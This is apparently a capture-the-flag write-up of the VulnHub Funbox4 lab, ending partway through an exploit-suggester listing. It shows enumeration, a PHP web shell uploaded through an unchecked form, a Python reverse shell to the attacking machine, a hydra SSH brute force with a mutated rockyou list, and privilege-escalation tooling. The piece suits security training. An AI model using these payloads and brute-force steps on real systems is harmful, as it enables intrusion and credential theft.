Published: 2025-12-10 19:28:34   Views: 23
Target Machine Pentest Practice 25: Funbox4 CTF

Target description
Target URL: https://www.vulnhub.com/entry/funbox-ctf,546/
Description
Groundhog Day: Boot2Root !
Initial footstep is a bit flawed, but really not difficult.
After getting access to Funbox: CTF, it's necessary to find, read and understand the (2 and easy to find) hints.
Be smart and combine…
Hints: Nikto scans “case sensitive” and you need a minimum of 15 mins to get user !
If you need hints, call me on twitter: @0815R2d2
Have fun…
This works better with VirtualBox rather than VMware
Attack machine (Kali):
IP address: 192.168.9.7
Target:
IP address: 192.168.9.43
Note: the target and Kali only need to be on the same LAN (the same subnet, i.e. both VMs using the same network mode).
Lab setup:
Import the downloaded target image into VirtualBox and set its network adapter to Host-Only; in VMware, set Kali's bridged adapter to bridge onto the VirtualBox Host-Only adapter.
arp-scan -I eth0 -l
☁ kali arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:c7:72:ce       PCS Systemtechnik GmbH
192.168.9.43    08:00:27:95:e3:7b       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 2 responded
☁ kali
Alternatives for host discovery on the same subnet:
masscan 192.168.9.0/24 -p 80,22
netdiscover -i eth0 -r 192.168.9.0/24
Use nmap -A -sV -T4 -p- <target IP> to enumerate the open ports:
☁ kali nmap -A -sV -T4 -p- 192.168.9.43
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 10:48 CST
Nmap scan report for bogon (192.168.9.43)
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
|   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP PIPELINING UIDL SASL CAPA AUTH-RESP-CODE
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: Pre-login IDLE more listed SASL-IR IMAP4rev1 LOGINDISABLEDA0001 capabilities LITERAL+ ENABLE post-login ID OK LOGIN-REFERRALS have
MAC Address: 08:00:27:95:E3:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   0.36 ms  bogon (192.168.9.43)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds
The following ports are open:
22 - ssh - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80 - http - Apache httpd 2.4.18 ((Ubuntu))
110 - pop3 - Dovecot pop3d
143 - imap - Dovecot imapd
SSH, POP3 and IMAP would normally only yield to brute force, and there is no suitable wordlist yet, so start with the web server.
Visit port 80 in a browser: it serves the Apache2 Ubuntu default page.
View the page source: nothing of interest.
Scan for directories:
gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
☁ kali gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.43/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html,zip,bak
[+] Timeout:                 10s
===============================================================
2022/03/15 10:55:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta.zip             (Status: 403) [Size: 295]
/.hta.bak             (Status: 403) [Size: 295]
/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.hta.txt             (Status: 403) [Size: 295]
/.htaccess.html       (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 296]
/.hta.php             (Status: 403) [Size: 295]
/.htaccess.zip        (Status: 403) [Size: 300]
/.htpasswd.zip        (Status: 403) [Size: 300]
/.htaccess.bak        (Status: 403) [Size: 300]
/.hta.html            (Status: 403) [Size: 296]
/.htaccess.txt        (Status: 403) [Size: 300]
/.htpasswd.bak        (Status: 403) [Size: 300]
/.htaccess.php        (Status: 403) [Size: 300]
/.htpasswd.txt        (Status: 403) [Size: 300]
/.htpasswd.php        (Status: 403) [Size: 300]
/.htpasswd.html       (Status: 403) [Size: 301]
/index.html           (Status: 200) [Size: 11321]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 300]
===============================================================
2022/03/15 10:56:00 Finished
===============================================================
☁ kali
Nothing found. Try a larger wordlist:
☁ kali gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.43/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html,zip,bak
[+] Timeout:                 10s
===============================================================
2022/03/15 11:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess.bak        (Status: 403) [Size: 300]
/.htpasswd.html       (Status: 403) [Size: 301]
/.htaccess.txt        (Status: 403) [Size: 300]
/.htpasswd.zip        (Status: 403) [Size: 300]
/.htaccess.php        (Status: 403) [Size: 300]
/.htpasswd.bak        (Status: 403) [Size: 300]
/.htpasswd.txt        (Status: 403) [Size: 300]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd.php        (Status: 403) [Size: 300]
/.htaccess.html       (Status: 403) [Size: 301]
/.htaccess.zip        (Status: 403) [Size: 300]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 300]
===============================================================
2022/03/15 11:04:00 Finished
===============================================================
☁ kali
Still nothing. The description hints that the scan is case sensitive, so rerun the scan with uppercase variants of the wordlist (dirsearch --uppercase); directory bruteforcers only try the exact spelling in the list, and Apache on Linux treats ROBOTS.TXT and robots.txt as different files:
☁ kali dirsearch -u http://192.168.9.43/ -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt --uppercase -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784

Output File: /root/.dirsearch/reports/192.168.9.43/-_22-03-15_11-10-21.txt

Error Log: /root/.dirsearch/logs/errors-22-03-15_11-10-21.log

Target: http://192.168.9.43/

[11:10:21] Starting:
[11:11:11] 200 -  273B  - /ROBOTS.TXT
Visit: http://192.168.9.43/ROBOTS.TXT
Visit: http://192.168.9.43/upload/
Visit: view-source:http://192.168.9.43/ROBOTS.TXT
Scroll down and find a further entry:
Disallow: igmseklhgmrjmtherij2145236
Try combining this with the paths seen so far:
Visit: http://192.168.9.43/upload/igmseklhgmrjmtherij2145236
Not found.
Visit: http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/
Not found.
Hmm, that was a guess. Scan each directory properly instead:
☁ kali dirsearch -u http://192.168.9.43/upload -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784

Output File: /root/.dirsearch/reports/192.168.9.43/-upload_22-03-15_11-27-07.txt

Error Log: /root/.dirsearch/logs/errors-22-03-15_11-27-07.log

Target: http://192.168.9.43/upload/

[11:27:07] Starting:

Task Completed
Nothing under /upload/. Try the other directory:
☁ kali dirsearch -u http://192.168.9.43/igmseklhgmrjmtherij2145236 -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784

Output File: /root/.dirsearch/reports/192.168.9.43/-igmseklhgmrjmtherij2145236_22-03-15_11-25-26.txt

Error Log: /root/.dirsearch/logs/errors-22-03-15_11-25-26.log

Target: http://192.168.9.43/igmseklhgmrjmtherij2145236/

[11:25:26] Starting:
[11:26:31] 200 -  297B  - /igmseklhgmrjmtherij2145236/upload.html
[11:26:31] 200 -  319B  - /igmseklhgmrjmtherij2145236/upload.php
[11:26:31] 403 -  321B  - /igmseklhgmrjmtherij2145236/upload/
[11:26:31] 301 -  340B  - /igmseklhgmrjmtherij2145236/upload  ->  http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/

Task Completed
So that is where it lives: the hidden directory has its own upload.php, and the files it stores land in its upload/ subdirectory.
Visit: http://192.168.9.43/igmseklhgmrjmtherij2145236/upload.php
Upload shell.php; the upload is accepted without any check on the extension or content:
<?php echo "Shell";system($_GET['cmd']); ?>
Visit: http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/shell.php
Test command execution: http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/shell.php?cmd=whoami
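The whole bug is that upload.php takes a .php file from the client and writes it into a directory the web server executes scripts from. The validator below is an added example and not the challenge's upload.php (its source is not shown above); it is written in Python to illustrate the server-side checks that would have rejected shell.php: discard the client-supplied path, allow exactly one extension from an image allowlist, require the body's magic bytes to match that extension, cap the size, and store under a name the client does not choose. The allowlist, the size cap and the sha256 naming scheme are assumptions made for the demo, and the sample uploads are constructed.

```python
"""Server-side upload validation (added, illustrative example; not the challenge's upload.php).

Policy demonstrated: discard the client-supplied path, allow exactly one
extension from an image allowlist, require the content's magic bytes to match
that extension, cap the size, and store under a content-derived name.
Allowlist, size cap and the sha256 naming scheme are assumptions for the demo.
"""
import hashlib
import os
from typing import NamedTuple, Optional

# Declared extension -> magic byte prefixes the body must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024   # assumed limit for the demo


class Verdict(NamedTuple):
    accepted: bool
    reason: str
    stored_name: Optional[str]   # name to write under the upload directory, or None


def validate_upload(client_filename: str, content: bytes) -> Verdict:
    # 1. Never trust the client's path; keep only the last component (handles ../ and C:\ paths).
    base = os.path.basename(client_filename.replace("\\", "/"))
    # 2. Exactly "name.ext": rejects shell.php.png and .htaccess outright;
    #    shell.php and shell.phtml then fail the allowlist below.
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return Verdict(False, "filename must be name.ext with exactly one extension", None)
    ext = parts[1].lower()
    if ext not in MAGIC:
        return Verdict(False, f"extension .{ext} not in allowlist", None)
    # 3. Size cap before any further processing of the body.
    if len(content) > MAX_BYTES:
        return Verdict(False, "file too large", None)
    # 4. The body must actually be the type the extension claims.
    if not any(content.startswith(magic) for magic in MAGIC[ext]):
        return Verdict(False, f"content does not look like {ext}", None)
    # 5. The stored name is derived from the content, never from the request.
    digest = hashlib.sha256(content).hexdigest()[:32]
    stored_ext = "jpg" if ext == "jpeg" else ext
    return Verdict(True, "ok", f"{digest}.{stored_ext}")


# Constructed sample uploads for the demo (not real captured requests).
WEBSHELL = b'<?php echo "Shell";system($_GET["cmd"]); ?>'
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, body in [("shell.php", WEBSHELL), ("../../evil.png", WEBSHELL), ("cat.PNG", PNG_STUB)]:
        print(name, "->", validate_upload(name, body))
```

Even with these checks, the upload directory should also have script execution disabled in the web server configuration (for Apache, remove the PHP handler for that directory); the validator and the server policy back each other up.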
Start a listener on the attacking machine: nc -lvp 443
Check whether python is available on the target, then spawn a python reverse shell (when it is sent through ?cmd=, the command must be URL-encoded):
which python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.9.7",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
The listener receives a shell:
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -al /home
total 16
drwxr-xr-x  4 root   root   4096 Aug 29  2020 .
drwxr-xr-x 23 root   root   4096 Mar 14 08:40 ..
drwx------  4 anna   anna   4096 Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4096 Aug 30  2020 thomas
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /home/anna
bash: cd: /home/anna: Permission denied
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /home/thomas
www-data@funbox4:/home/thomas$ ls -al
total 3052
drwxr-xr-x 4 thomas thomas    4096 Aug 30  2020 .
drwxr-xr-x 4 root   root      4096 Aug 29  2020 ..
-rw------- 1 thomas thomas      46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas     220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas    3771 Aug 29  2020 .bashrc
drwx------ 2 thomas thomas    4096 Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas     675 Aug 29  2020 .profile
drwx------ 2 thomas thomas    4096 Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas     195 Aug 29  2020 .todo
-rw------- 1 thomas thomas    1304 Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas     217 Aug 30  2020 .wget-hsts
-rwx------ 1 thomas thomas 3078592 Aug 22  2019 pspy64
www-data@funbox4:/home/thomas$ cat .bash_history
cat: .bash_history: Permission denied
www-data@funbox4:/home/thomas$ ./pspy64
bash: ./pspy64: Permission denied
www-data@funbox4:/home/thomas$ cat .viminfo
cat: .viminfo: Permission denied
www-data@funbox4:/home/thomas$ cat .todo
1. make coffee
2. check backup
3. buy ram
4. call simone
5. check my mails
6. call lucas
7. add an exclamation mark to my passwords
......
100. learn to read emails without a gui-client !!!
www-data@funbox4:/home/thomas$ cat .wget-hsts
# HSTS 1.0 Known Hosts database for GNU Wget.
# Edit at your own risk.
# <hostname>[:<port>]   <incl. subdomains>      <created>       <max-age>
raw.githubusercontent.com       0       0       1598788938      31536000
github.com      0       1       1598788977      31536000
www-data@funbox4:/home/thomas$
Among the hints in .todo, item 7 says thomas adds an exclamation mark to his passwords, so his password most likely ends in "!".
Build a targeted wordlist by appending an exclamation mark to every entry of rockyou.txt (the sed expression matches the end of each line, so a trailing "!" is added to each password):
sed 's/$/!/' /usr/share/wordlists/rockyou.txt > wordlist
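Both wordlist tricks used on this box are instances of the same idea, rule-based wordlist mutation: the --uppercase pass of dirsearch that found ROBOTS.TXT, and the sed one-liner that turns rockyou.txt into a "!"-suffixed password list. The script below is an added example, not code from the original writeup nor from dirsearch or hydra. It implements a small hashcat-style rule subset (`:` keep, `l` lower, `u` upper, `c` capitalise, `$X` append, `^X` prepend), applies it to constructed sample words, and can also be run as a filter over a real wordlist; the sample words, the rule choices and the rockyou path in the usage comment are assumptions.

```python
"""Rule-based wordlist mutation (added example; not code from the original writeup).

Implements a small subset of hashcat-style rules:
  :    keep the word unchanged
  l    lowercase            u    uppercase
  c    capitalise the first letter, lowercase the rest
  $X   append character X    ^X   prepend character X
Rules can be chained, e.g. 'c$!' turns 'thebest' into 'Thebest!'.
"""
import sys
from typing import Iterable, List


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule string to one word, left to right."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":
            i += 1
        elif op == "l":
            word = word.lower()
            i += 1
        elif op == "u":
            word = word.upper()
            i += 1
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
            i += 1
        elif op in "$^":
            if i + 1 >= len(rule):
                raise ValueError(f"rule {rule!r}: {op} needs a character argument")
            ch = rule[i + 1]
            word = word + ch if op == "$" else ch + word
            i += 2
        else:
            raise ValueError(f"unsupported rule op {op!r} in {rule!r}")
    return word


def mutate(words: Iterable[str], rules: List[str]) -> List[str]:
    """Apply every rule to every word; keep input order, drop blanks and duplicates."""
    seen = set()
    out: List[str] = []
    for raw in words:
        word = raw.rstrip("\r\n")
        if not word:
            continue
        for rule in rules:
            candidate = apply_rule(word, rule)
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


# Constructed sample inputs (assumptions for the demo, not the real wordlists).
PATH_WORDS = ["robots.txt", "upload", "admin"]
PASSWORD_WORDS = ["thebest", "password", "thebest"]   # duplicate on purpose

# Case variants for a directory scan: what the --uppercase pass adds on top of the plain list.
PATH_RULES = [":", "u", "c"]
# The .todo hint: every password gets a trailing '!' (what the sed one-liner does).
PASSWORD_RULES = ["$!"]


def path_candidates() -> List[str]:
    return mutate(PATH_WORDS, PATH_RULES)


def password_candidates() -> List[str]:
    return mutate(PASSWORD_WORDS, PASSWORD_RULES)


if __name__ == "__main__":
    # Usage: python3 mutate.py '$!' < /usr/share/wordlists/rockyou.txt > wordlist
    # rockyou.txt is not valid UTF-8 throughout, so treat it as latin-1 bytes.
    rules = sys.argv[1:] or PATH_RULES
    lines = sys.stdin.buffer.read().decode("latin-1").splitlines()
    sys.stdout.buffer.write(("\n".join(mutate(lines, rules)) + "\n").encode("latin-1"))
```

Quote the rule on the command line (`'$!'`), otherwise the shell expands `$!`. Deduplication matters for a slow online attack like the hydra run below: every duplicate costs a full SSH handshake.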
Brute-force SSH with hydra:
hydra -l thomas -P wordlist ssh://192.168.9.43 -t 4
☁ FunBox4 hydra -l thomas -P wordlist ssh://192.168.9.43 -t 4
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 15:15:32
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344876 login tries (l:1/p:14344876), ~3586219 tries per task
[DATA] attacking ssh://192.168.9.43:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344832 to do in 5433:39h, 4 active
[STATUS] 34.33 tries/min, 103 tries in 00:03h, 14344773 to do in 6963:29h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344672 to do in 8203:40h, 4 active
[STATUS] 29.60 tries/min, 444 tries in 00:15h, 14344432 to do in 8076:50h, 4 active
[22][ssh] host: 192.168.9.43   login: thomas   password: thebest!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 15:45:05
Credentials recovered: thomas / thebest!
Note the rate: about 30 tries per minute with -t 4, so the hit after roughly 30 minutes means the password sat within the first few hundred entries of rockyou. A full pass over the 14 million entries would take years at this speed, which is why the "!" hint is what makes the attack feasible (the description's "minimum of 15 mins to get user" refers to this wait).
Log in over SSH: ssh thomas@192.168.9.43
☁ FunBox4 ssh thomas@192.168.9.43
The authenticity of host '192.168.9.43 (192.168.9.43)' can't be established.
ED25519 key fingerprint is SHA256:leXWAQi41mdgTrDRpU9czEhIlC3wU4nrwaFkbOthtH0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.43' (ED25519) to the list of known hosts.
thomas@192.168.9.43's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

133 packages can be updated.
5 updates are security updates.

*** System restart required ***
Last login: Sun Aug 30 14:55:47 2020 from 192.168.178.143
thomas@funbox4:~$
Logged in as thomas.
Since wget is not available on the target, copy the enumeration script over with scp from the attacking machine:
☁ FunBox4 scp linpeas.sh thomas@192.168.9.43:/tmp/
thomas@192.168.9.43's password:
linpeas.sh                                    100%  745KB  27.2MB/s   00:00
Make it executable and run it; it turned up nothing especially valuable here:
thomas@funbox4:~$ ls /tmp/
linpeas.sh
systemd-private-1495159d9cfc44648ffa307a1cfa546a-dovecot.service-lWW9s3
systemd-private-1495159d9cfc44648ffa307a1cfa546a-systemd-timesyncd.service-Pe6Ngd
thomas@funbox4:~$ chmod 777 /tmp/linpeas.sh
thomas@funbox4:~$ ls -al /tmp/linpeas.sh
-rwxrwxrwx 1 thomas thomas 762836 Mar 14 12:38 /tmp/linpeas.sh
thomas@funbox4:~$
Copy over the exploit-suggester script:
☁ FunBox4 scp linux-exploit-suggester.sh thomas@192.168.9.43:/tmp/
thomas@192.168.9.43's password:
linux-exploit-suggester.sh                    100%   87KB  55.8MB/s   00:00
☁ FunBox4
Run it:
thomas@funbox4:~$ chmod 777 /tmp/linux-exploit-suggester.sh
thomas@funbox4:~$ bash /tmp/linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
49 user space exploits

Possible Exploits:

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: highly probable
   Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: highly probable
   Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ],debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20,debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

